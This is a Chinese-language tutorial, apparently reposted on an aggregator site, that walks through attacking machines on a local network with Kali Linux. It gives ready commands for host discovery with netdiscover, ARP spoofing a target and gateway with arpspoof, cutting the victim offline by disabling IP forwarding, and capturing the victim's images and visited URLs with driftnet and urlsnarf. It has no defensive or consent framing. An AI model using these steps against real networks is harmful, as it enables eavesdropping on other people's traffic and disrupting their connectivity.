龙空技术网

Kali局域网嗅探和断网拦截

寻不到旧时的路 869

前言:

如今兄弟们对“kalitelnet嗅探”可能比较关切,看官们都需要学习一些“kalitelnet嗅探”的相关内容。那么小编也在网络上收集了一些关于“kalitelnet嗅探””的相关文章,希望姐妹们能喜欢,同学们一起来了解一下吧!

1. 打开终端,数据命令ifconfig,获取本机ip和网卡信息,只需要ip和网卡信息;

2. 获取局域网内存活的主机信息:输入命令:netdiscover -i eth0 -r 192.168.0.1/24

3. 这里有两种方式,一种是断网,一种是不断网

(1) 断网的方式,可以使对方断网

A) 输入命令:echo 0 > /proc/sys/net/ipv4/ip_forward

B) 检查结果,如果为0,则为断网模式:cat /proc/sys/net/ipv4/ip_forward

(2) 不断网的方式,在对方不断网的情况下,进行网络请求信息获取

A) 输入命令:echo 1 > /proc/sys/net/ipv4/ip_forward

B) 检查结果,如果为1,则为不断网模式:cat /proc/sys/net/ipv4/ip_forward

C) 代理中转,将代理配置到本机,让流量从本机经过,则可以进行请求拦截;

输入命令:arpspoof -t 目标主机 目标网关 -i 网卡

如:arpspoof -t 192.168.1.2 192.168.1.1 -i eth0

D) 抓取对方请求的图片,,输入命令:driftnet -i 网卡 ;输入命令后如果成功给,则会弹出driftnet窗口,图片将在上面显示。

如:driftnet -i eth0

E) 抓取对方请求的网站,输入命令:urlsnarf -i 网卡

如:urlsnarf -i eth0

标签: #kalitelnet嗅探